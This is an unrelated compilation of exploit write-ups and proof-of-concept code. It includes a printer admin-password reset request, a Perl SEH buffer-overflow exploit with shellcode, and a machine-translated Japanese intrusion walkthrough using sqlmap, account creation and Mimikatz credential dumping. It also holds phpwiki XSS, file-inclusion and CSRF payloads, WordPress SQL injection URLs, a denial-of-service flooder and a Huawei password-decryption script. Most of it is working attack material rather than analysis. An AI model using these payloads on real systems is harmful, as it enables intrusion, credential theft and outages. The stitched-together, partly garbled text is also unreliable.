By default, it is necessary to know current password in order to change it, but when request will be missing POST anewpass & confpass parameters, admin password will be set to null.
devil@hell:~$ curl -gi http://192.168.0.10/
HTTP/1.1 401
Date: Sat, 21 Dec 1996 12:00:00 GMT
WWW-Authenticate: Basic realm="Default password:1234"
401 Unauthorized - User authentication is required.
Request:
POST /PrtSet.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/pssystem.htm
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
BoxName=MFD55329&anewpass=1234&confpass=1234&PSPORTNAME1=&PSPORTNAME2=&PSPORTNAME3=&save.x=47&save.y=11
Response:
HTTP/1.1 200 OK
Date: Sat, 21 Dec 1996 12:00:00 GMT
Content-type: text/html
<html><head><title>Advance Settings</title><link rel="stylesheet" href="set.css"></head>
(...)
Following curl request will set admin account with empty password.
PoC:
devil@hell:~$ curl -XPOST --data "" -s http://192.168.0.10/PrtSet.cgi > /dev/null
#*************************************************************************************************************
#
# Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64
# Date: 8-29-2015
# Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow.
#
# Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort
# to manually adding an exception to ASLR in the registry for this to work.
# creds to Corelan & team: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
#
# Edit HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ and add a new key called “MoveImages” (DWORD)
# set the key to '0'.
#
# Instructions:
# Generate the payload text file by running this payload creator as is. The payload is called: buffy.txt by default
# Next, open the pftp.exe program.
# Click 'options', 'advanced options', and 'block ip'. Click on the text field and paste
# in your payload generated by this payload creator and click 'Add'. It will look like this:
#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAë31Ò²0d‹‹R‹R‹B‹r ‹€~3uò‰Çx<‹Wx‹z Ç1í‹4¯ÆE>Fatauò~Exitué‹z$Çf‹,o‹zÇ‹|¯üÇhytehkenBh Bro‰áþI1ÀQPÿ×
#
# that's it. You should then be greeted with a MessageBox.
#**************************************************************************************************************
my $junk = "A" x 272;
#$nseh = "\xcc\xcc\xcc\xcc"; # breakpoint for testing
$nseh = "\xeb\x10\x90\x90"; # jump to shellcode
$seh = pack('V',0x03033303); # popad, call ebp from \Device\HarddiskVolume1\Windows\Fonts\StaticCache.dat, which is outside the module range and has SEH off
#MessageBox Shellc0de
#https://www.exploit-db.com/exploits/28996/
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
$nops = "\x90" x 20;
my $junk2 = "\x90" x 1000;
open(myfile,'>buffy.txt');
print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2;
close (myfile);
0x01弱いパスワード
特定のサイトの情報を収集するプロセス中に、サブドメイン名をスキャンして古いシステムにスキャンします。
これが2014年の古い駅であることを見たとき、何か間違ったものがあるに違いありません!
毎日使用してげっぷブラストを試してみてくださいが、破裂しませんでした
しかし、すぐに試してみると、良い男は123/123にシステムに入り、彼は運に満ちていました。
(高強度コーディング)
ここでは、「エディター」担当者の許可であり、アップロードなどのバックエンド管理機能はありません。システムのさまざまな機能を辛抱強く実行することができます。
0x02 SQL注入
システムを入力して反転させたため、機密情報漏れはありませんでしたが、SQL注入は人事情報が調査されたインターフェースで見つかりました(Xray Passiveスキャンでスキャン)
http://host.com/xxx/control/searchmenhuninfo?content=123
現時点では、手動で検証する場合は、バックグラウンドクッキーを必要とせずにインターフェイスに直接アクセスできることがわかります。これは、不正アクセスの脆弱性に相当します。
次に、このsqlmapシャトル、 - クッキーパラメーターは必要ありません
python sqlmap.py -u 'http://host.com/xxx/control/searchmenhuninfo?content=123' - current -db
ライブラリ名はこちらで、これがOracleデータベースであることもわかります。シェルで試してみる予定です。
ただし、私の毎日の浸透プロセスでは、Oracleデータベースは一般的ではありません。 SQLMapの-S-ShellパラメーターはまだOracleデータベースをサポートしていないため、できるだけ早く学習して販売することができます。
0x03 GETSHELL
最初にこの記事を参照してくださいOracle Injection -CommandExecution Shell Bounce
Oracleの次のバージョンは、注入を発見した後に実行できます。
次に、SQLMAPを使用してOracleバージョンを表示します
python sqlmap.py -u 'http://host.com/xxx/control/searchmenhuninfo?content=123' -b
コマンドで実行できるバージョンに沿っているようです!
別の長い学習の後、私はGitHubの男がOracleshell Oracle Databaseコマンドの実行に統合したツールを発見しました
ツールのスクリーンショットは次のとおりです
コマンドを実行しようとするために、データベースSID、ユーザー名、およびパスワードを知る必要があることもわかります。
その後、SQLMAPを使用して既知の情報を拡大し続けます。
データベースの権限を表示-IS-DBA
データベースIP、SIDを表示します
ここでは、SQLMapの-SQL-Shellモードを入力し、SQLステートメントを使用してクエリを使用します
クエリSID:v $ instanceからinstance_nameを選択します
現在のIPをクエリします:dualからsys_context( 'userenv'、 'ip_address')を選択します
すべてのデータベースアカウントとパスワードをブラストします
SQLMAPの-PassWordsパラメーターを使用して、データベースのユーザー名と対応するパスワードを実行します
長い間待った後、結果が最終的に得られました(架空のデータはここに記載されています)
データベース管理システムユーザーパスワードハッシュ:
[*]匿名[1] :
パスワードhash:匿名
[*] HR [1] :
パスワードHASH: 6399F3B38EDF3288
[*] Sys [1] :
パスワードHASH: 4DE42795E66117AE
[*] Sysman [1] :
パスワードHASH: B607EEBB3A2D36D0
[*]システム[1] :
パスワードHASH: 8877FF8306EF558B
クリアテキストpassword: sys
一部のユーザー名は対応するハッシュのみを取得することがわかりますが、ユーザー名システムの1つはPlantextパスワードから正常に尽きました。
Oracleが一般的に使用されるポートをクエリします
Oracleは本当にそれに慣れていないので、Baiduはポートをチェックします:
クエリは、サーバーのデフォルトポート番号が通常389であり、クライアントのデフォルトポート番号は通常1521であることがわかりました。
わかりました!これで、IP、ポート、SID、ユーザー名(システム)、およびパスワード(SYS)ができ、ツールを使用して直接接続できます。
ではごきげんよう!取得したシステム許可!
0x04さらに害を証明します
ユーザーを作成してみてください
ネットユーザー名pwd /add
ネットローカルグループ管理者名/追加
リモートデスクトップRDP接続名/PWD
接続は成功しました!
Mimikatzをアップロードして、管理者のPlantextパスワードをつかみます
特権:Debug
sekurlsa:3360logonpasswords
最後に、管理者アカウントRDPに正常にログインしました
この時点で、浸透は終了します。
0x05要約
弱いパスワード-SQLインジェクションゲットシェルゲット管理者権限
1.サブドメイン名スキャンツールを使用してターゲットドメイン名をスキャンし、人事管理システムがあることを見つけます
2。123/123の弱いパスワードを手動でテストしてシステムを入力します
3.バックグラウンドクエリ担当者にSQLインジェクションの脆弱性があります(Xrayパッシブスキャンでスキャン)
4.現在のデータベースをSQLMAPを介してOracleに実行します
python sqlmap.py -u 'http://host.com/xxx/control/searchmenhuninfo?content=123' - current -db
5。SQLMAPの-OS-ShellパラメーターはOracleデータベースをサポートしていないため、sqlを介して機密情報のみを見つけることができます。
6. Oracleバージョンをクエリして、バージョンが10.2.1.0であることがわかります(Oracleによってコマンドを実行できるバージョンは8.1.7.4、9.2.01-9.2.0.7、10.1.0.2-10.1.0.4、10.2.0.1-10.2.0.2)
python sqlmap.py -u 'http://host.com/xxx/control/searchmenhuninfo?content=123' -b
7。DBAアクセス許可であるデータベース権限をクエリします
python sqlmap.py -u 'http://host.com/xxx/control/searchmenhuninfo?content=123' -is -dba
8。使用してデータベースIPとSIDを見つけて表示するには
v $ instance //query sidからinstance_nameを選択します
dual //現在のIPをクエリからsys_context( 'userenv'、 'ip_address')を選択します
9。パスワードダンプはSQLMAPを介して実行され、ユーザー名システムはPlantextパスワードを正常に実行します
python sqlmap.py -u 'http://host.com/xxx/control/searchmenhuninfo?content=123' - passwords
10。同時に、データベースサーバーIPがNMAPを介してスキャンされ、1521ポートが開かれました。
11. Oracleshellツールを介してデータベースにリモート接続し、システムコマンドを実行する
12.コマンドにユーザー名とパスワードを追加し、管理者グループに追加して、レジストリを介してリモートデスクトップを有効にします。
ネットユーザー名pwd /add
ネットローカルグループ管理者名/追加
13. Mimikatzを介してシステムパスワードを読みます
特権:Debug
sekurlsa:3360logonpasswords
オリジナルリンク:https://www.freebuf.com/articles/web/284911.html
# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion
# Date: 29.08.15
# Vendor: sourceforge.net/projects/phpwiki/
# Affected versions: => 1.5.4 (current)
# Tested on: Apache2.2 / PHP5 / Deb32
# Author: Smash_
# Contact: smash [at] devilteam.pl
1/ Cross Site Scripting
Cross-site scripting vulnerability in user preferences allows remote unauthenticated users to inject arbitrary web script by injecting code via GET or POST 'pagename' parameter.
Example url:
http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--
Example request:
POST /phpwiki/index.php/UserPreferences HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260
pref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse
Example response:
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 21:30:47 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Content-Length: 16114
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
(...)
<script type="text/javascript">
<!--//
var rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';
var rateit_action = 'RateIt';
// --></script>
<script type="text/javascript">
<!--//
var data_path = '/phpwiki';
var pagename = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';
var script_url= '/phpwiki/index.php';
var stylepath = data_path+'/themes/Sidebar/';
var folderArrowPath = '/phpwiki/themes/default/images';
var use_path_info = true;
// --></script>
</head>
(...)
2/ Local File Inclusion
Directory traversal vulnerability in file load section allows authenticated attackers to read arbitrary files via POST or GET 'source' parameter. Content of file will be later available in created page.
Example url:
http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group
#1 - Example request:
POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd
#1 - Example response:
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 22:09:36 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3534
(...)
<a id="contentTop"></a>
<h1 class="firstHeading">Loading “/etc/passwd”</h1>
<div id="bodyContent">
<em><a href="passwd" class="wiki">passwd</a></em><span> from “plain file /etc/passwd” content is identical to current version 1 - no new revision created</span><p><strong>Complete.</strong></p>
<p>Return to <a href="PhpWikiAdministration" class="wiki">PhpWikiAdministration</a></p>
(...)
#2 - Example request:
GET /phpwiki/index.php/passwd HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
Connection: keep-alive
#2 - Example response:
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 22:10:34 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8"
Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT
Cache-Control: must-revalidate
Expires: Sat, 29 Aug 2015 22:10:14 GMT
Vary: Cookie
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22599
(...)
<div class="wikitext"><p>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
<a href="news:x:9:9:news:/var/spool/news:/bin/sh" target="_blank" class="namedurl"><span style="white-space: nowrap"><img src="/phpwiki/themes/Sidebar/images/url.png" alt="" class="linkicon" />news:x:9:9:news:/var/spool/news:/bin/sh</span></a>
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server<sub>,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon</sub>,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon<sub>,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:113::/home/ntp:/bin/false
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
arpwatch:x:108:117:ARP Watcher</sub>,:/var/lib/arpwatch:/bin/sh
avahi:x:109:118:Avahi mDNS daemon<sub>,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
dradis:x:111:121::/var/lib/dradis:/bin/false
pulse:x:112:122:<span style="text-decoration: underline" class="wikiunknown"><span>PulseAudio</span><a href="PulseAudio?action=create" title="Create: PulseAudio" onmouseover="window.status="Create: PulseAudio"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span> daemon</sub>,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher<sub>,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:124:Hardware abstraction layer</sub>,:/var/run/hald:/bin/false
iodine:x:115:65534::/var/run/iodine:/bin/false
postgres:x:116:127:PostgreSQL administrator<sub>,:/var/lib/postgresql:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
redsocks:x:118:128::/var/run/redsocks:/bin/false
snmp:x:119:129::/var/lib/snmp:/bin/false
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:133::/nonexistent:/bin/false
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:136:<span style="text-decoration: underline" class="wikiunknown"><span>RealtimeKit</span><a href="RealtimeKit?action=create" title="Create: RealtimeKit" onmouseover="window.status="Create: RealtimeKit"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span></sub>,:/proc:/bin/false
saned:x:125:137::/home/saned:/bin/false
devil:x:1000:1001:devil<sub>,:/home/devil:/bin/bash
debian-tor:x:126:138::/var/lib/tor:/bin/false
privoxy:x:127:65534::/etc/privoxy:/bin/false
redis:x:128:139:redis server</sub>,:/var/lib/redis:/bin/false</p>
</div>
(...)
3/ Cross Site Request Forgery
Since there is no csrf protection in application, remote attacker is able to trigger specific actions.
PoC:
<html>
<!-- Change settings / XSS -->
<body>
<form action="http://192.168.0.10/phpwiki/index.php/UserPreferences" method="POST">
<input type="hidden" name="pref[email]" value="" />
<input type="hidden" name="pref[notifyPages]" value="" />
<input type="hidden" name="pref[theme]" value="" />
<input type="hidden" name="pref[lang]" value="" />
<input type="hidden" name="pref[editHeight]" value="22" />
<input type="hidden" name="pref[editWidth]" value="80" />
<input type="hidden" name="pref[timeOffset]" value="0" />
<input type="hidden" name="pagename" value="UserPreferencesabc</script><script>alert(document.cookie)</script><!--" />
<input type="hidden" name="action" value="browse" />
<input type="submit" value="Go" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/56576/info
Friends in War The FAQ Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--
source: https://www.securityfocus.com/bid/56575/info
Omni-Secure is prone to multiple file-disclosure vulnerabilities.
An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks.
Versions Omni-Secure 5, 6 and 7 are vulnerable.
http://www.example.co/mpath/lib/browsefiles.php?dir=/
http://www.example.co/mpath/lib/browsefolders.php?dir=/
source: https://www.securityfocus.com/bid/56570/info
WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.
Code in test.jsp:
<title>Test Page</title>
<script>
var foo = "<%= request.getParameter("foo") %>";
document.write("<text>Welcome "+ foo + "</text>");
</script>
Example URI:
http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1
source: https://www.securityfocus.com/bid/56569/info
The Tagged Albums plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql]
source: https://www.securityfocus.com/bid/56568/info
The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users--
source: https://www.securityfocus.com/bid/56567/info
Media Player Classic WebServer is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability.
An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Std;
use Socket;
my $SOCKET = "";
$loop = 1000;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t*=============================================================*\n";
print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
print "\t* --- By : X-Cisadane ---*\n";
print "\t* --- ------------------------------------------------ ---*\n";
print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
print "\t* --- ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
exit;
}
print "\t*=============================================================*\n";
print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
print "\t* --- By : X-Cisadane ---*\n";
print "\t* --- ------------------------------------------------ ---*\n";
print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
print "\t* --- ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
print "\n";
print " Please Wait Till The Buffer is Done\n";
my $b1 = "\x41" x 100000000;
$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";
print "\n";
print " Attacking the Target, Please Wait Till Pwned \n";
for ($j=1;$j<$loop;$j++) {
socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
$DoS=IO::Socket::INET->new("$ip:$port") or die;
send(SOCKET,$b1, 0) || die "failure sent: $!\n";
print $DoS "stor $b1\n";
print $DoS "QUIT\n";
close $DoS;
close SOCKET;
}
# exit :
source: https://www.securityfocus.com/bid/56510/info
Multiple Huawei products are prone to a weak password encryption weakness.
Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks.
The following are vulnerable:
Huawei Quidway series
Huawei CX600 V600R001
Huawei CX600 V600R003C00SPC900
Huawei ME60 V600R002C07 and prior versions
AR 19/29/49 R2207 and prior versions
from Crypto.Cipher import DES
def decode_char(c):
if c == 'a':
r = '?'
else:
r = c
return ord(r) - ord('!')
def ascii_to_binary(s):
assert len(s) == 24
out = [0]*18
i = 0
j = 0
for i in range(0, len(s), 4):
y = decode_char(s[i + 0])
y = (y << 6) & 0xffffff
k = decode_char(s[i + 1])
y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff
k = decode_char(s[i + 2])
y = (y | k) & 0xffffff
y = (y << 6) & 0xffffff
k = decode_char(s[i + 3])
y = (y | k) & 0xffffff
out[j+2] = chr(y & 0xff)
out[j+1] = chr((y>>8) & 0xff)
out[j+0] = chr((y>>16) & 0xff)
j += 3
return "".join(out)
def decrypt_password(p):
r = ascii_to_binary(p)
r = r[:16]
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
r = d.decrypt(r)
return r.rstrip("\x00")
source: https://www.securityfocus.com/bid/56479/info
The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL]
source: https://www.securityfocus.com/bid/56478/info
The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL]
source: https://www.securityfocus.com/bid/56477/info
The Kakao theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
source: https://www.securityfocus.com/bid/56474/info
ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ESRI ArcGIS for Server 10.1 is vulnerable; other versions may also be affected.
http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects
source: https://www.securityfocus.com/bid/56465/info
AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.
Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.
AWCM 2.2 is vulnerable; other versions may also be affected.
Authentication Bypass:
http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
ex) http://targethost/awcm/cookie_gen.php?
name=awcm_member&content=123456
Security Bypass:
[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
method=\"post\"]
[input type=\"hidden\" name=\"coment\" value=\'insert
uninvited comments 2\' /]
[input type=\"submit\" value=\"Submit\"]
</form>